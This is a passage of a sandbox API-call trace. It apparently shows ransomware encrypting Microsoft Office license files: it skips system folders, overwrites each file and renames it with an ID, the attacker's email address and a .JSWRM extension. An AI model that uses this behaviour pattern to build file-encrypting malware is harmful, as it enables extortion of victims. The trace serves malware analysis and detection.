dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.019] CloseHandle (hObject=0x45c) returned 1 [0109.019] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0109.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.019] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0109.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.019] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0109.019] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0109.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.020] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0109.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0109.020] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0109.020] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e458 [0109.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0109.020] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0109.020] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp2-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp2-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp2-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp2-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0109.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0109.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cdf8 | out: hHeap=0x1e0000) returned 1 [0109.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0109.021] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0109.021] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xea0deb98, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xea0deb98, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xea23602f, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5eef, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProPlusR_OEM_Perp2-ppd.xrm-ms", cAlternateFileName="PRB3EA~1.XRM")) returned 1 [0109.021] lstrcmpiW (lpString1="ProPlusR_OEM_Perp2-ppd.xrm-ms", lpString2=".") returned 1 [0109.021] lstrcmpiW (lpString1="ProPlusR_OEM_Perp2-ppd.xrm-ms", lpString2="..") returned 1 [0109.021] lstrcmpiW (lpString1="ProPlusR_OEM_Perp2-ppd.xrm-ms", lpString2="...") returned 1 [0109.021] lstrcmpiW (lpString1="ProPlusR_OEM_Perp2-ppd.xrm-ms", lpString2="windows") returned -1 [0109.021] lstrcmpiW (lpString1="ProPlusR_OEM_Perp2-ppd.xrm-ms", lpString2="recovery") returned -1 [0109.021] lstrcmpiW (lpString1="ProPlusR_OEM_Perp2-ppd.xrm-ms", lpString2="perflogs") returned 1 [0109.021] lstrcmpiW (lpString1="ProPlusR_OEM_Perp2-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0109.021] lstrcmpiW (lpString1="ProPlusR_OEM_Perp2-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.021] lstrcmpiW (lpString1="ProPlusR_OEM_Perp2-ppd.xrm-ms", lpString2="system volume information") returned -1 [0109.021] lstrcmpiW (lpString1="ProPlusR_OEM_Perp2-ppd.xrm-ms", lpString2="msocache") returned 1 [0109.021] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0109.022] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp2-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0109.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0109.022] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp2-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x240fe8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_OEM_Perp2-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0109.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0109.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d770 [0109.022] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp2-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0109.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0109.022] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp2-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x2410d8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_OEM_Perp2-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0109.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d770 | out: hHeap=0x1e0000) returned 1 [0109.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0109.022] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0109.022] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.022] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0109.022] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp2-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp2-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.022] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=24303) returned 1 [0109.023] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.023] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5ee0) returned 0x24c1d0 [0109.023] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5ee0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5ee0, lpOverlapped=0x0) returned 1 [0109.026] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.026] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5ee0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5ee0, lpOverlapped=0x0) returned 1 [0109.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.026] CloseHandle (hObject=0x45c) returned 1 [0109.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0109.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0109.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0109.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0109.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0109.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0109.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0109.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e458 [0109.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0109.026] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0109.026] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp2-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp2-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp2-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp2-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0109.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0109.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0109.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0109.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0109.028] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe9ff9d7f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe9ff9d7f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xea1774fd, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d4c, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProPlusR_OEM_Perp2-ul-oob.xrm-ms", cAlternateFileName="PRDF5E~1.XRM")) returned 1 [0109.028] lstrcmpiW (lpString1="ProPlusR_OEM_Perp2-ul-oob.xrm-ms", lpString2=".") returned 1 [0109.028] lstrcmpiW (lpString1="ProPlusR_OEM_Perp2-ul-oob.xrm-ms", lpString2="..") returned 1 [0109.028] lstrcmpiW (lpString1="ProPlusR_OEM_Perp2-ul-oob.xrm-ms", lpString2="...") returned 1 [0109.028] lstrcmpiW (lpString1="ProPlusR_OEM_Perp2-ul-oob.xrm-ms", lpString2="windows") returned -1 [0109.028] lstrcmpiW (lpString1="ProPlusR_OEM_Perp2-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0109.028] lstrcmpiW (lpString1="ProPlusR_OEM_Perp2-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0109.028] lstrcmpiW (lpString1="ProPlusR_OEM_Perp2-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0109.028] lstrcmpiW (lpString1="ProPlusR_OEM_Perp2-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.028] lstrcmpiW (lpString1="ProPlusR_OEM_Perp2-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0109.028] lstrcmpiW (lpString1="ProPlusR_OEM_Perp2-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0109.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0109.028] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp2-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0109.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0109.028] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp2-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22cdc8, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_OEM_Perp2-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0109.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0109.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c170 [0109.028] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp2-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0109.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0109.028] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp2-ul-oob.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22ce70, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_OEM_Perp2-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0109.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c170 | out: hHeap=0x1e0000) returned 1 [0109.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0109.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0109.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.029] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0109.029] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp2-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp2-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0109.029] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11596) returned 1 [0109.029] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.029] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d40) returned 0x24c1d0 [0109.029] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d40, lpOverlapped=0x0) returned 1 [0109.031] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0109.031] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d40, lpOverlapped=0x0) returned 1 [0109.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0109.032] CloseHandle (hObject=0x45c) returned 1 [0109.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0109.032] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0109.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0109.032] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0109.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0109.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0109.032] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0109.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a228 [0109.032] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a228, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0109.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a228 | out: hHeap=0x1e0000) returned 1 [0109.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0109.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23eae8 [0109.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0109.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0109.032] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp2-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp2-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp2-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\proplusr_oem_perp2-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0109.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23eae8 | out: hHeap=0x1e0000) returned 1 [0109.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0109.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0109.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0109.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0109.033] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe9ff9d7f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe9ff9d7f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xea1c39c1, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4de5, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProPlusR_OEM_Perp2-ul-phn.xrm-ms", cAlternateFileName="PR2E49~1.XRM")) returned 1 [0109.037] lstrcmpiW (lpString1="ProPlusR_OEM_Perp2-ul-phn.xrm-ms", lpString2=".") returned 1 [0109.037] lstrcmpiW (lpString1="ProPlusR_OEM_Perp2-ul-phn.xrm-ms", lpString2="..") returned 1 [0109.037] lstrcmpiW (lpString1="ProPlusR_OEM_Perp2-ul-phn.xrm-ms", lpString2="...") returned 1 [0109.037] lstrcmpiW (lpString1="ProPlusR_OEM_Perp2-ul-phn.xrm-ms", lpString2="windows") returned -1 [0109.037] lstrcmpiW (lpString1="ProPlusR_OEM_Perp2-ul-phn.xrm-ms", lpString2="recovery") returned -1 [0109.037] lstrcmpiW (lpString1="ProPlusR_OEM_Perp2-ul-phn.xrm-ms", lpString2="perflogs") returned 1 [0109.037] lstrcmpiW (lpString1="ProPlusR_OEM_Perp2-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0109.037] lstrcmpiW (lpString1="ProPlusR_OEM_Perp2-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0109.037] lstrcmpiW (lpString1="ProPlusR_OEM_Perp2-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0109.037] lstrcmpiW (lpString1="ProPlusR_OEM_Perp2-ul-phn.xrm-ms", lpString2="msocache") returned 1 [0109.037] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0109.037] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp2-ul-phn.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0109.037] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0109.037] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp2-ul-phn.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d260, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_OEM_Perp2-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0109.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0109.037] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bfb8 [0109.037] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp2-ul-phn.xrm-ms", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0109.037] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0109.037] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProPlusR_OEM_Perp2-ul-phn.xrm-ms", cchWideChar=32, lpMultiByteStr=0x22d298, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProPlusR_OEM_Perp2-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 32 [0109.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bfb8 | out: hHeap=0x1e0000) returned 1 [0109.037] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0109.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0109.037] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0109.037] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0109.037] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0109.037] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProPlusR_OEM_Perp2-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft 